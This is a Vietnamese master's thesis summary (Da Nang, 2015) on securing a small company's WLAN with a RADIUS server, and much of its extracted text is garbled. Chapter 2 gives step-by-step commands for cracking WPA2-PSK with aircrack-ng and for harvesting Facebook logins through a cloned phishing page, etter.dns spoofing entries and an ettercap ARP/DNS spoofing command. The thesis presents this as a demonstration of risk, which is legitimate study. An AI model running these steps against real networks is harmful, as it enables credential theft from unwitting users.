BỘ GIÁO DỤC VÀ ĐÀO TẠO ĐẠI HỌC ĐÀ NẴNG NGÔ TÂN XÂY DỰNG HỆ THỐNG BẢO MẬT MẠNG WLAN PHỤC VỤ KINH DOANH TẠI CƠNG TY SÀI GỊN HT Chun ngành: KHOA HỌC MÁY TÍNH Mã số: 60.48.01.01 TĨM TẮT LUẬN VĂN THẠC SĨ KỸ THUẬT Đà Nẵng – Năm 2015 Cơng trình đƣợc hồn thành ĐẠI HỌC ĐÀ NẴNG Ngƣời hƣớng dẫn khoa học: PGS.TS PHAN HUY KHÁNH Phản biện 1: TS HUỲNH CÔNG PHÁP Phản biện 2: PGS.TS TRƢƠNG CÔNG TUẤN Luận văn đƣợc bảo vệ trƣớc Hội đồng chấm Luận văn tốt nghiệp thạc sĩ kỹ thuật họp Đại học Đà Nẵng vào ngày 17 tháng 08 năm 2015 Có thể tìm hiểu luận văn tại: - Trung tâm Thông tin-Học liệu, Đại học Đà Nẵng - Thƣ viện trƣờng Đại học Bách Khoa, Đại học Đà Nẵng MỞ ĐẦU Tính cấp thiết đề tài Vài năm gần đây, công nghệ thông tin nƣớc ta phát triển cách vƣợt bậc, đặt biệt công nghệ mạng không dây wifi Những thuận lợi mạng khơng dây nhƣ tính linh động, hiệu khả mở rộng linh động so với mạng có dây Bên cạnh thuận lợi đó, mạng khơng dây có nhiều nhƣợc điểm cần đƣợc khắc phục nhƣ truyền sóng điện từ nên có khả bị nhiễu cao, tốc độ truyền kém, mạng không dây dễ bị cơng thơng tin đƣợc truyền khơng khí nên dễ bị bắt đƣợc Theo thống kê sơ cơng ty Sài Gòn HT cho thấy có nhiều cơng nhằm vào mạng nội công ty, gây nghẽn mạng, không vào đƣợc mạng, liệu mật nhạy cảm công ty nhƣ khách hàng, vài tháng gần hoạt động công ngày tinh vi hơn, hiệu hơn, gây nhiều thiệt hại so với lúc ban đầu Hơn có nhiều phản ảnh khách hàng chơi game online công ty uống nƣớc giải khát bị tài khoản game, gây mát nhiều dụng cụ game online Có nhiều thƣ rác đƣợc gởi đến tài khoản mail khác hàng đăng nhập công ty khách hàng giải trí Tất vấn đề đa phần chế bảo mật công ty khơng đƣợc tốt, làm giảm uy tín công ty khách hàng, đồng thời giảm số lƣợng sản phẩm đƣợc bán ra, làm tăng nguy thua lỗ cơng ty Do em đề xuất đề tài “Xây dựng hệ thống bảo mật mạng WLAN phục vụ kinh doanh công ty Sài Gòn HT” Mục đích em xây dựng hệ thống bảo mật mạng cho công ty nhằm bảo mật hệ thống liệu thông tin quang trọng tránh đƣợc rủi ro tính chất bảo mật mạng công ty làm ảnh hƣởng đến lợi nhuận nhƣ uy tín cơng ty với khách hàng Mục tiêu nhiệm vụ đề tài - Nghiên cứu thành phần mạng WLAN - Nghiên cứu các phƣơng thức thiết lập truy cập WLAN - Nghiên cứu phƣơng pháp công bảo mật mạng WLAN - Xây dựng hệ thống bảo mật mạng WLAN cho công ty - Chống xâm nhập bất hợp pháp từ bên vào hệ thống mạng Đối tƣợng phạm vi nghiên cứu Đối tƣợng đề tài nghiên cứu nghiên cứu chế hoạt động mạng WLAN, nghiên cứu phƣơng pháp công giải pháp bảo mật, sở xây dựng hệ thống bảo mật tốt cho công ty Phƣơng pháp nghiên cứu Dựa hệ thống windows server Microsoft ta xây dựng hệ thống bảo mật Radius Server Cấu hình kết nối AP để kiểm tra tính bảo mật hệ thống Đồng thời xem xét khả công xây dựng chế độ bảo mật dựa hệ thống 5.Ý nghĩa khoa học thực tiễn đề tài - Giúp ta hiểu rõ mơ hình mạng WLAN - Hiểu rõ cách vận hành khai thác WLAN - Hiểu rõ các công bảo mật mạng WLAN - Giúp ta phòng tránh hiệu vấn đề bảo mật mạng WLAN - Xây dựng đƣợc hệ thống mạng WLAN an tồn cho cơng ty - Có ứng dụng cao thực tiễn Dự kiến kết - Có thể hach đƣợc wifi có chế độ bảo mật WPA2 - Sau hack đƣợc password wifi ta lấy password facebook - Cài đặt đƣợc thực tế chế bảo mật Radius Server - Quản lý đƣợc tài khoản truy cập vào mạng WLAN Cấu trúc luận văn Nội dung trình bày luận văn em đƣợc bố cụ nhƣ sau: Chƣơng 1:Trình bày tổng quan mạng WLAN, ƣu điểm nhƣợc điểm mạng WLAN, phƣơng pháp cơng bảo mật hệ thống WLAN Chƣơng 2:Trình bày Demo cách công lấy pass mạng wifi bảo mật WPA2 phƣơng pháp dò từ điển cách lấy pass facebook cách cách sử dụng DNS giả mạo Chƣơng 3:Trình bày chế hoạt động cách cấu hình giải pháp bảo mật Radius Server nhằm ứng dụng bảo mật mạng cho cơng ty sài gòn HT CHƢƠNG GIỚI THIỆU VỀ MẠNG KHÔNG DÂY WLAN 1.1 GIỚI THIỆU TỔNG QUAN VỀ MẠNG WLAN 1.1.1 Giới thiêu WLAN Mạng WLAN mạng Lan khơng dây, dùng để kết nối nhiều máy tính lại với mà không cần đển dây dẫn, môi trƣờng truyền dẫn mạng WLAN khơng khí, sử dụng sóng vơ tuyến để truyền truyền theo hƣớng không gian 1.1.2 Ưu điểm WLAN Sự thuận tiện: Các client di chuyển tự vùng phủ sóng mạng WLAN Tăng cƣờng số lƣợng client kết nối mạng cách nhanh chóng cách thêm AP 1.1.3 Nhược điểm WLAN Bảo mật: Các SSID đƣợc quảng bá khơng đƣợc mã hóa nên dễ bị bắt đƣợc có password xâm nhập vào mạng đƣợc Phạm vi: Phạm vi hoạt động có bán kính vài chục mét Độ tin cậy: Có thể bị nhiễu, chập chờn môi trƣờng Tốc độ: Tốc độ mạng WLAN chậm so với mạng có dây 1.2 CÁC PHƢƠNG PHÁP TẤN CƠNG WLAN Các phƣơng pháp cơng mạng phổ biến nay: 1.2.1 Passive Attack Là phƣơng pháp công đơn giản, không để lại dâu vết, phƣơng pháp công gián tiếp cho công khác Nó lấy thơng tin truyền khơng khí mà khơng đƣợc mã hóa Nếu lấy đƣợc tài khoản dựa vào hacker cơng vào hệ thống mạng máy tính 1.2.2 Active Attack Tấn công chủ động công đƣợc thự sau có đƣợc tài khoản đăng nhập đƣợc vào mạng sau thực công vào hệ thống mạng, chủ chổng động xâm nhập để lấy account, password từ sở cơng hệ thống khác mạng WLAN, hệ thống khác 1.2.3 De-authentication Attack Mục đích kiểu công xác thực lại nhằm mục đích gây nghẽn mạng có q nhiều u cầu xác thực Khi máy muốn tham gia vào mạng phải qua q trình xác thực AP Khi attacker tham gia đƣợc vào mạng hệ thống họ có đƣợc địa quảng bá gọi broadcast Họ sử dụng địa mà gởi thông tin De-authentication đến tất node mạng AP yêu cấu node mạng xác thực lại Các node mạng chấp nhập thông điệp xác thực lại mà không nghi ngờ tính chất xác thực u cầu xác thực lại có phải đƣợc gởi đến từ AP hay khơng Sau node tiến hành xác thực reconet Để làm nghẽn mạng hệ thống, attacker tiến hành phát tán liên tục thông điệp xác thực đến node mạng Việc node đồng loạt xác thực reconet làm nghẽn hệ thống mạng WLAN, dẫn đến không truy cập đƣợc vào mạng, tê liệt hệ thống 1.2.4 Rogue Access Point a Giới thiệu Access point giả mạo AP đƣợc tạo nhƣng khơng phải AP có thiết kế hệ thống mạng b Phân loại - Access Point đƣợc cấu hình khơng hồn chỉnh - Access Point giả mạo từ mạng WLAN lân cận - Access Point giả mạo kẻ công tạo - Access Point giả mạo đƣợc thiết lập nhân viên cơng ty 1.2.5 Disassociation Flood Attack Tấn công Disassociation Flood Attack kiểu công nhằm ngắt kết nối từ AP đến máy client 1.2.6 Tấn cơng dựa cảm nhận sóng mang lớp vật lý Nguyên lý phƣơng pháp công làm cho máy tính ln ln trạng thái chờ attacker gởi xong liệu đƣờng truyền 1.2.7 Jamming Attack Mục đích cơng chèn ép để làm shut down hệ thống mạng WLAN hệ thống Các attacker sử dụng phát sóng RF có tần số cao, hay trùng với tần số mạng WLAN đƣợc phát làm gây nhiễu tín hiệu sóng truyền mạng WLAN Các node bên ngồi khơng thể truy cập vào AP ngun nhân sóng truyền giữ AP node bị nhiễu Muốn xử lý công chèn ép này, ta phải sử dụng máy phân tích phổ (máy cầm tay cho tiện) để xem có vùng sóng có tần số với sóng WLAN phát hay khơng, từ xem xuất phát từ vị trí để đƣa giải pháp phòng tránh hay sử lý Các nhiễu sóng thiết bị khác tần số thƣờng xảy điều khó tránh khỏi Vì xung quanh có nhiều thiết bị dùng chung tần số với Do cần phải quản lý tần số cách có hiệu quả, sử dụng tần số mà thiết bị sử dụng để tránh bị gây nhiễu khơng đáng có, tạo thuận lợi cho mạng công ty 1.2.8 Man In The Middle Attack (MITM) Tấn cơng MITM nói đơn giản hiểu rằng, hai máy tính truyền thơng tin cho mạng, kẻ cơng kết nối vào hệ thống mạng đứng hai ngƣời truyền thông tin với Attacker relay tin cho hai bên, gói tin bên qua máy attacker Các loại cơng MITM Có ba loại cơng MITM chủ yếu là: giả mạo ARP Cache, giả mạo DNS, chiếm quyền điểu khiển Session 1.2.9 Dictionary Attack Tấn công từ điển phƣơng pháp công đơn giản nhằm tra thử từ từ điển có phải password hay khơng, phải ta có password khơng tiếp hết từ điển 1.3 CÁC GIẢI PHÁP BẢO MẬT WLAN 1.3.1 Vì lại phải bảo mật WLAN? Vì mạng WLAN mơi trƣờng truyền khơng khí, có nhiều vấn đề nhƣ dễ bị lấy liệu truyền, bị nghẽn, bị nhiễu sóng… Vì cần xây dựng giải pháp để bảo vệ mạng WLAN tránh bị phá hoại bên ngồi Vì để bảo vệ mạng WLAN ta cần phải ý: - Các vị trí mà mạng WLAN bị xâm nhập: - Các bƣớc để bảo mật mạng WLAN: 1.3.2 WEP WEP có nghĩa bảo mật khơng dây tƣơng đƣơng với có dây Web sử dụng 64 bít 128 bít làm khóa khơng thay đổi, sử dụng 24 bít cho việc khởi tạo véc tơ mã hóa lại 40 bít 104 bít đƣợc sử dụng để truyền mã hóa liệu mạng WLAN Cơ chế bảo mật WEP có khóa dễ dàng bị bẻ gãy công cụ WEPCrack 1.3.3 WLAN VPN Mạng riêng ảo đƣợc tạo nhằm mục địch tạo kênh riêng lẽ cho node mạng truy cập có chế bảo mật cao nhằm tránh xâm nhập trái phép vào hệ thống mạng 1.3.4 TKIP TKIP sử dụng khóa động cách đặt cho frame chuỗi số riêng để chống lại dạng cơng giả mạo Nó nâng cấp WEP vá lỗi vấn đề cách bảo mật dòng RC4 WEP tạo 1.3.5 AES AES thuật tốn mã hóa khối, thuật tốn đƣợc phủ Hoa Kỳ áp dụng làm tiêu chuẩn mã hóa, đƣợc nghiên cứu kỹ lƣỡng nhằm mục đích áp dụng phạm vi toàn giới 1.3.6 WPA WPA đƣợc đời cơng nghệ WEP có nhiều lỗi hổng, dễ dàng bị xâm nhập phá hoại, nghe lén, lấy cắp liệu Nó khắc phục đƣợc nhiều nhƣợc điểm WEP Sử dụng thuật tốn TKIP CR4, mã hóa đầy đủ 128 bít có khóa đƣợc thay đổi liên tục Nó có chế kiểm tra tồn vẹn thông tin để đảm bảo thông tin không bị sửa đổi đƣờng truyền 1.3.7 WPA2 WPA2 sử dụng mã hóa AES CCMP nhằm thay cho TKIP TKIP đƣợc sử dụng cho phƣơng án dự phòng Attacker cần có thời gian từ đến 12 để phá password WPA2 WPA2 cần khóa chức WPS Ta có chuẩn bảo mật wifi, đƣợc xếp từ cao đến thấp: - WPA2 + AES 10 CHƢƠNG DEMO TẤN CÔNG VÀO MẠNG KHÔNG DÂY WLAN CĨ BẢO MẬT LÀ WPA2-PSK 2.1 DEMO TẤN CƠNG MẠNG Ở em xin trình bày demo cách cơng lấy password truy cập wifi tài khoảng facebook để chứng minh hệ thống bảo mật bị cơng đƣợc cơng cụ BACKTRACK 2.1.1 Bẻ khóa mật mạng wifi chuẩn WPA2-PSK AES phương pháp Dictionary Attack Sau em xin dùng cơng cụ Aircrack-ng để bẻ khóa mạng đƣợc bảo mật chế WPA2-PSK AES Đây lệnh việc công công dụng demo cơng airmon-ng: Dùng để chuyển card wireless sang dạng monitor (chế độ nghe ngóng ghi nhận tín hiệu) airodump-ng: Dùng để phát WLAN bắt gói liệu (packet capture) aireplay-ng: Tạo dòng tín hiệu aircrack-ng: Tìm mã khóa WPA2 Mục đích việc lắng nghe liệu đƣờng truyền, lƣu chế bắt tay vào file Sau dùng file với từ điển dạng “*.TXT” để dò password có khả Việc dò từ điển trung bình thƣờng từ đến 12 tiếng, có kí tự đặt biệt dò khó đƣợc Sau bƣớc công mạng wifi Các bước thực 11 Bước 1: Để thu nhận tín hiệu mạng WLAN, sử dụng lệnh airmon-ng để đƣa card WLAN vào chế độ monitor Sau tiếp tục với lệnh airmon-ng start WLAN0 để khởi động lại adapter chế độ monitor Mục tiêu cơng AP có chế bảo mật WPA2 Do cần tìm AP có chế bảo mật WPA2 địa mác client kết nối đến Điều quan nêu tìm khơng đƣợc máy client kết nối đến AP khơng thể cơng đƣợc sau tìm đƣợc sử dụng cách công ARP replay để tạo dòng liệu cần thiết Chúng ta cần có ba thơng tin để bắt đủ dòng liệu, tạo điều kiện cho aircrack hoạt động: địa MAC/BSSID AP mục tiêu, địa MAC/BSSID máy trạm kết nối với AP, kênh (channel) đƣợc sử dụng AP mục tiêu máy trạm, sử dụng lệnh :airodump-ng mon0 Bước 2: Khởi động lệnh airodump-ng để thu thập thông tin mạng chuẩn bị công cách gõ lệnh: airodump-ng –c -w tan bssid B0:48:7A:D5:57:92 ivs mon0 Bước 3: Bƣớc chạy airodump-ng lần trƣớc, airodump-ng ivs channel [AP channel] bssid [AP BSSID] write capturefile WLAN0 Các files liệu bắt đƣợc đƣợc lƣu vào thƣ mục gốc /root có dạng capturefile_nn.ivsnn hai số, ví dụ nhƣ capturefile_01.ivs Bước 4: Chạy lệnh aireplay-ng -3 -b [AP BSSID] -h [client MAC from airodump] WLAN0 Lệnh khởi động ARP lặp lại AP mục tiêu cách giả mạo địa MAC STA kết nối đến AP 12 Bước 5: Đánh lệnh aircrack-ng –b [AP BSSID] [capture file(s) name] Dòng lệnh có chứa dấu (*) để aircrack-ng sử dụng toàn file Ivs bắt đƣợc đƣợc lƣu thƣ mục gốc Aircrack bắt đầu lục lọi số gói liệu bắt đƣợc để tìm khóa WEP Bước 6: Chạy lệnh aircrack-ng –w pass txt tan-01 cap để thực lấy password Trong số trƣờng hợp aircrack-ng kết thúc mà không tìm thấy khóa, nhƣng đƣa cho bạn số đề xuất mà bạn làm theo Để tránh công từ điển, cần thiết lập password phải mạnh (độ phức tạp cao) 2.1.2 Lấy account trang faceboo.com kỹ thuật giả mạo DNS Sau truy cập đƣợc vào mạng hệ thống dùng đến phƣơng pháp công MITM mà cách sử dụng giả mạo DNS Cách công đơn giản nhƣng hiệu cao, bạn biết viết đƣợc code website thuận lợi lớn việc cơng Ví dụ: http://www microsoft.com có IP 207.46.232.182, cố gắng đƣợc gửi đến địa http://www microsoft.com giả mạo cƣ trú địa IP 74.125.71.106, địa mà kẻ công tạo trƣớc để đánh cắp thông tin tài khoản ngân hàng trực tuyến từ ngƣời dùng Có nhiều cách để thực vấn đề giả mạo DNS Chúng sử dụng kỹ thuật mang tên giả mạo DNS ID Đầu tiên, cần giả mạo ARP cache thiết bị mục tiêu để định tuyến lại lƣu lƣợng qua host cơng mình, từ chặn yêu cầu DNS gửi gói liệu giả mạo 13 Mục đích kịch lừa ngƣời dùng mạng mục tiêu truy cập vào website độc thay website mà họ cố gắng truy cập Để rõ bạn tham khảo thêm hình cơng bên dƣới Cơng cụ để thực cơng giả mạo DNS Ettercap, sử dụng cho Windows Linux trƣớc thực thi Ettercap, yêu cần bạn cần phải thực chút cấu hình Trên linux bạn theo đƣờng dẫn /usr/share/ettercap/etter.dns để chỉnh sửa lại file etter.dns, file đơn giản có chứa ghi DNS mà bạn muốn giả mạo Chúng ta đƣa ngƣời dùng cố gắng truy cập vào trang web www.facebook com chuyển hƣớng đến trang Phising đƣợc dựng sẵn máy Các bước thực Bước 1: Khởi động backtrack cấu hình card mạng, backtrack5 ta thay đổi địa máy cài backtrack là: IP:192.168.0.130/24, default gateway:192.168.0.1, tạo dns 8.8.8.8 Bước 2: Sử dụng Social Engineering Tookit để giả mạo trang : www.facbook.com Bước 3: Tiếp theo ta chon mục sau để tạo trang web giả mạo, chọn: Social-Engineering Attacks  Website Attack vectors  Credential Harvester Attack Method  Site Cloner  IP address for the POST back in Harvester/tabnabbing : 192.168.0.130 (IP máy công)  Enter the url to clone: www.facebook.com (Tên trang web cần công ) 14 Bước 4: Mở file etter.dns theo đƣờng dẩn /usr/share/ettercap/etter.dns cấu hình nhƣ sau lƣu lại file Facebook com A 192.168.0.130 *.Facebook com A 192.168.0.130 www Facebook com PTR 192.168.0.130 Với 192.168.0.130 địa IP máy công Bước 5: Thực cơng MITM Ettercap, cấu hình ettercap theo bƣớc nhƣ sau: Chạy lệnh : #ettercap -T -q -i eth0 -P dns_spoof -M arp // // Đợi máy nạn nhân truy cập vào trang facebook com giả mạo đăng nhập vào ta có đƣợc tài khoản nạn nhân: Ở ta thu đƣợc kết mong muốn tài khoản nạn nhân Với bƣớc đơn giản khơng có phòng bị nạn nhân, hacker lấy đƣợc tài khoản dễ dàng 2.2 KẾT QUẢ ĐẠT ĐƢỢC Ta công thành công lấy đƣợc password wifi tài khoản máy client Vì cần phải có chế bảo mật mạnh WPA2 hệ thống mạng tăng cƣờng tính bảo mật 15 CHƢƠNG BẢO MẬT WLAN BẰNG PHƢƠNG PHÁP XÁC THỰC RADIUS SERVER VÀ WPA2 3.1 VẤN ĐỀ BẢO MẬT WLAN VÀ CÁC GIẢI PHÁP 3.1.1 Giới thiệu công ty Công ty SÀI GỊN HT cơng ty mua bán bảo hành thiết bị tin học gồm có tất 35 nhân viên gồm kế toán, nhân viên bán hàng, nhân viên bảo hành máy tính thiết bị văn phòng, nhân viên bảo vệ WLAN dùng dịch vụ doanh giải trí nhƣ xem phim, game online, cà phê wifi, vào internet 3.1.2 Tình hình bảo mật mạng WLAN công ty Theo thống kê sơ cơng ty Sài Gòn HT cho thấy có nhiều cơng nhằm vào mạng nội công ty, gây nghẽn mạng, không vào đƣợc mạng, liệu mật nhạy cảm công ty nhƣ khách hang, vài tháng gần hoạt động công ngày tinh vi hơn, hiệu hơn, gây nhiều thiệt hại so với tháng trƣớc trƣớc 3.1.3 Các yêu cầu giải pháp đề xuất Vì cần đƣa giải pháp hiệu cho bảo mật mạng công ty Một chế bảo mật đƣợc ứng dụng cho công ty phải đáp ứng yêu cầu sau đây: tính hiệu giải pháp, chi phí giải pháp, vận hành quản lý Các giải pháp đề xuất cho việc bảo mật mạng WLAN công ty Qua q trình nghiên cứu phân tích hệ thống bảo mật mạng Sau em xin đề xuất số giải pháp cho việc bảo mật mạng cơng ty SÀI GỊN HT: sử dụng tƣờng lửa 16 Firewall, sử dụng chế bảo mật WPA2-PSK AES, giải pháp phát xâm nhập mạng IPS, giải pháp xây dựng mạng riêng ảo VPN, giải pháp xây dựng RADIUS SERVER a Nhận xét sơ lược giải pháp đề xuất: Mỗi giải pháp đƣợc đƣa có ƣu điểm nhƣợc điểm nó.Dựa theo tiêu chí yêu cầu giải pháp mà chọn phƣơng pháp hợp lệ Giải pháp RADIUS SERVER có ƣu điểm trội sau đây: Dễ dàng cài đặt quản lý, chi phí giá thành rẻ, hoạt động liên tục 24/24, bảo trì sửa chữa dễ dàng, dùng RADIUS SERVER có nhiều AP b Lựa chọn giải pháp Với ƣu điểm vƣợt trội hệ thống bảo mật RADIUS SERVER nên em đề xuất xây dựng hệ thống bảo mật tốt sử dụng hệ thổng bảo mật RADIUS SERVER Trong hệ thống bảo mật WLAN công ty vừa nhỏ hệ thống bảo mật RADIUS SERVER nói tốt nay, đến chƣa có giải pháp pháp thay đƣợc giải pháp 3.2 GIỚI THIỆU TỔNG QUAN VỀ RADIUS SERVER Sau em xin giới thiệu cách thức RADIUS hoạt động, việc chạy máy chủ RADIUS để hổ trợ cho việc xác thực WLAN có ƣu điểm so với việc xác thực khơng có máy chủ 3.2.1 Xác thực, cấp phép kiểm tốn Có khả cung cấp xác thực tập trung, cấp phép điều khiển truy cập cho phiên làm việc với SLIP PPP Dial-up – nhƣ việc xác thực nhà cung cấp dịch vụ ISP Server có khả tập trung lại thành điểm tất liệu, thông tin ngƣời dùng, điều kiện để truy 17 cập đƣợc hệ thống mạng Sau đăng nhập có u cầu truy cập thơng qua port đƣợc xác định máy chủ Máy chủ kiểm tra thông tin sở liệu, đƣợc đăng nhập, khơng Khi thông tin đƣợc máy chủ kiểm tra thỏa mãn cho phép truy cập mạng với thiết kế bảo mật dành riêng cho tài khoản Khi có kết nối đếm RADIUS đƣợc thiết lập cho phiên làm việc Cuối kết thúc phiên làm việc NAS gởi thông điệp ngƣng kết nối với phiên RADIUS Accounting-Request (Stop) để giải phóng băng thông đƣờng truyền mạng 3.2.2 Sự bảo mật tính mở rộng Các thơng điệp message type, sequence number, length, Authenticator, loạt Attribute-Value đƣợc đóng gói giao thức UDP.Các password trao đổi đƣợc mã hóa NAS AAA Server sử dụng Authenticator để hiểu đƣợc thông tin đƣợc mã hóa nhƣ mật khẩu, khóa Các số ngẫu nhiên, thông điệp phản hồi, thông số bảo mật đƣợc MD5 băm để tạo thành chuỗi mã hóa khác cho q trình xác thực, nhằm tăng độ phức tạp Trong cặp đôi giá trị Attribute-Value pairs bao gồm User-Password, NAS-IPAddress, NAS-Port, Service-Type Các nhà sản xuất định nghĩa các giá trị riêng nhằm để mang thông tin 3.2.3 Áp dụng RADIUS cho WLAN Trong trình xác thực, thơng tin u cầu kết nối đƣợc gởi đến AP Các thông tin đƣợc gởi đến AAA server Nếu AP nhận đƣợc thông điệp chấp nhận truy cập từ AAA server cho 18 client kết nối Các thông tin đƣợc truyền đƣợc mã hóa AES TKIP Ngƣợc lại client bị ngắt kết nối với AP Khi liệu đƣợc truyền đƣờng truyền từ máy trạm đên AP khác máy trạm khác bắt đƣợc gói tin đƣờng truyền Do cần phải mã hóa liệu để bảo đảm tính bảo mật trƣớc truyền đƣờng truyền đến AP đến trạm 3.2.4 Các lựa chọn nâng cấp Trong máy chủ RADIUS server bạn cần phải thiết lập máy chủ AAA để hỗ trợ interaction trình xác thực WLAN Cần cập nhật phiên phần mềm cho server Nếu hệ thống có nhiều AP cần sử dụng RADIUS để quản lý tập trung, điều khó khăn thực hệ thống lớn Cần sử dụng kết hợp giải pháp bảo mật cho WLAN 3.2.5 Chúng ta lựa chọn máy chủ RADIUS hợp lý : Cần phải lựa chọn RADIUS server phù hợp với yêu cầu doanh nghiệp giá cả, tính bảo mật, tính dễ quản lý hiệu 3.3 MƠ TẢ TỔNG QUAN HỆ THỐNG RADIUS SERVER Do phát triển mạng WLAN, nên bảo mật cơng mang WLAN phát triển theo Các yêu cầu RADIUS SERVER - Yêu cầu: Cài cấu hình RADIUS server Window Server 2003, tạo user password cho client dự định tham gia vào mạng Trên TP Linksys, thiết đặt security mode WPA2-Enterprise Cho PC tham gia vào mạng, kiểm tra kết nối - Thiết bị yêu cầu: Một PC làm RADIUS SERVER đƣợc nâng cấp Domain 19 Controller sử dụng hệ điều hành windows Server 2003 Enterprise Edition Một PC sử dụng điều hành XP Professional làm client 3.4 QUY TRÌNH CÀI ĐẶT VÀ KẾT NỐI 3.4.1 Các bước cài đặt Bước 1: Cài DHCP Vào Control panel  Add/remove program  Add/remove Windows components  Networking Services  Chọn  Dynamic Host Configuration Protocol (DHCP)  Chọn OK Bước 2: Cài Enterprise CA Control panel  Add/remove program  Add/remove Windows components  Certificate services  Chọn  Certificate Services CA Chọn  Certificate Services Web Enrollment Support  Chọn OK (Trong q trình cài đặt nhớ chọn ln IIS để dùng Web Enrollment Wizard) Trong wizard ta chọn “Enterprise root CA” đặt tên cho CA “wifi” Bước 3: Cài Radius Vào Control panel  Add/remove program  Add/remove Windows components  Networking Services  Chọn  Internet Authentication Service Bước 4: Chuyển sang Native Mode Để điều khiển truy cập user qua Remote Access Policy Mở Active Directory Users and Computers Console từ thƣ mục Administrative Tools, click phải chuột vào tên server chọn “Raise domain Functional Level” Bước 5: Cấu hình DHCP Mở DHCP Console từ thƣ mục Administrative Tools, bấm phải chuột vào tên server chọn “Anthorize” để đăng ký với DC 20 Tạo Scope có tên “wifi” Scope range: 192.168.0.120/24  192.168.0.150 Lease Duration: ngày Default Gateway: 192.168.0.1 DNS Server: 192.168.0.101, 8.8.8.8 Bước 6: Cấu hình Radius Chọn IAS Console  Internet Authentication Service (Local) chọn "Register Server in Active Directory"  Chọn RADIUS Client  chọn "New RADIUS Client": nhập Địa IP Secret key Ở "Client-Vendor"  "RADIUS Standard" Shared Secret “11111111” (phải trùng với shared key AP) Bước 7: Tạo users, cấp quyền Remote access cho users cho computer Mở Active Directory Users and Computers Console từ thƣ mục Administrative Tools: ta tạo OU “wifi”, OU ta tạo user “User1”, password “123”, ta tạo tiếp computer có tên “WirelessClient”, OU “wifi” ta tạo group “wifi1”, thành viên group là: “WirelessClient” user “User1” Vào User account  Dial-in Tab  mục Remote Access Permission chọn “Control Access through Remote Access Policy” để quản lý việc vào User qua IAS Bước 8: Tạo Remote Access Policy Mở IAS Console từ thƣ mục Administrative Tools  Remote Access Policies  New Remote Access Policies Đặt tên cho Policy “wifi”, access mode “Wireless” Ta chọn phƣơng thức xác thực cho policy PEAP  Finish Bước 9: Cấu hình AP khai báo địa máy RADIUS Mở IE  Trên Address Bar ta gõ vào 192.168.0.1 (để vào cấu hình AP)  Chọn Tab Wireless  Tab Wireless Security 21 3.4.2 Kết nối từ client đến AP Ta khởi động Radius server AP Từ Wireless Client ta đăng nhập với user name “User1”, password “123” Trên Radius Server, ta vào Administrative Tools  Event Viewer  Security 3.5 QUẢN LÝ USERS, GROUPS 3.5.1 Quản lý users Quản lý user bao gồm chức nhƣ sau: a Reset password cho user b Di chuyển tài khoản sang nơi khác c Thiết lập thời gian đăng nhập cho tài khoản d Thiết lập thuộc tính khác user 3.5.2 Quản lý groups a Chuyển group sang loại group khác b Phân quyền user đến group Active Director c Thiết lập thuộc tính bảo mật cho group d Các thiết lập thuộc tính khác cho group 3.6 KẾT QUẢ ĐẠT ĐƢỢC Sau phân tích cài đặt đƣợc giải pháp bảo mật RADIUS SERVER việc bảo mật WLAN trở nên tốt cho cơng ty, quản lý user truy cập mạng, chứng thực nhiều AP cách tập trung Chúng ta kết hợp nhiều giải pháp bảo mật việc bảo mật đƣợc tốt 22 KẾT LUẬN KẾT QUẢ ĐẠT ĐƢỢC Với việc nghiên cứu xây dựng hệ thống bảo mật mạng cơng ty sài gòn HT phục vụ cho việc kinh doanh cơng ty, tơi có đƣợc kiến thức mạng WLAN nhƣ ƣu nhƣợc điểm, chế hoạt động, phƣơng thức công bảo mật WLAN, đồng thời xây dựng đƣợc chế bảo mật cho công ty với hệ thống bảo mật cao RADIUS SERVER Với quản lý truy cập hệ thống mạng user group, hệ thống mạng ngăn chặn đƣợc xâm nhập vào mạng trái phép user cách thiết lập chế bảo mật cho user nhƣ chặn dịch vụ quan trọng khơng cho phép bật tính quan nhƣ remote, ssh… để user khơng có nhiều khả để công vào mạng Hơn dễ dàng chặn user xâm nhập có khả nghi cơng mạng cách chặn truy cập vào mạng Các user truy cập đƣợc định thời gian truy cập mạng hệ thống, ngồi thời gian user tồn bị chặng login, điều gây nhiều khó khăn cho hacker có ý định cơng hệ thống mạng cơng ty RADIUS có phần overhead so với TACACS sử dụ ng UDP Trong phần overhead khơng có địa đích, port đích nên hacker khó cơng RADIUS có chức tính cƣớc (accounting) mở rộng RADIUS thƣờng đƣợc dùng để tính cƣớc dựa tài nguyên sử dụng Ví dụ nhƣ ISP tính cƣớc cho ngƣời dùng 23 chi phí kết nối Ta cài đặt RADIUS Accounting mà không cần sử dựng RADIUS để xác thực cấp quyền Với chức accounting mở rộng, ta theo dõi việc sử dụng tài nguyên tài khoảng suốt phiên làm việc tài khoản đăng nhập vào hệ thống Hệ thống đem lại nhiều lợi ích cho cơng ty bảo mật liệu nhƣ quản lý tài khoản truy cập vào hệ thống, user đƣợc cấp phát quyền hạn tùy theo chức user Phƣơng pháp áp dụng vào thực tế nhiều, hiệu việc ngăn chặn xâm nhập trái phép RADIUS SERVER giải pháp thiếu cho doanh nghiệp muốn quản lý tập trung tăng cƣờng tính bảo mật cho hệ thống HẠN CHẾ Tuy quản lý đƣợc tài khoản truy cập song biết đƣợc user sử dụng có ý định cơng hệ thống hay khơng, cơng cách Hơn nữa, có số RADIUS SERVER đƣợc hãng uy tín thiết kế có tính bảo mật cao song có giá thành đắt đỏ đƣợc tính chi phí user quản lý, nhƣ công ty trung bình cỡ tầm 25 đến 30 nhân viên khó để sử dụng hệ thống mà hãng uy tín thiết kết chi phí q đắt đỏ Các máy muốn truy cập cần cài chức máy client Chƣa triển khai đƣợc hệ điều hành LINUX Chƣa triển khai đƣợc cho mạng không dây diện rộng WMAN, WWAN Chƣa triển khai cho đƣờng truyền không dây tốc độ cao cơng nghệ WireMAX 24 HƢỚNG MỞ RỘNG Chúng ta xây dựng hệ thống RADIUS kết hợp với mạng riêng ảo VPN hệ thống phát xâm nhập IPS để tăng cƣờng tính bảo mật cho hệ thống WLAN cơng ty Xây dựng ứng dụng hệ thống WireMax Ứng dụng công nghệ Smart Card việc bảo mật WLAN Nghiên cứu công nghệ mạng wireless diện rộng WMAN (IEEE 802 16), WWAN (IEEE 802 20) Tìm hiểu u cầu, mơ hình thiết kế, triển khai bảo mật hệ thống mạng diện rộng WMAN, WWAN Triển khai xây dựng RADIUS hệ điều hành LINUX Nghiên cứu xây dựng phát công, xâm nhập từ user đăng nhập hệ thống, từ để dễ dàng quản lý ... mật mạng WLAN phục vụ kinh doanh cơng ty Sài Gòn HT 2 Mục đích em xây dựng hệ thống bảo mật mạng cho công ty nhằm bảo mật hệ thống liệu thông tin quang trọng tránh đƣợc 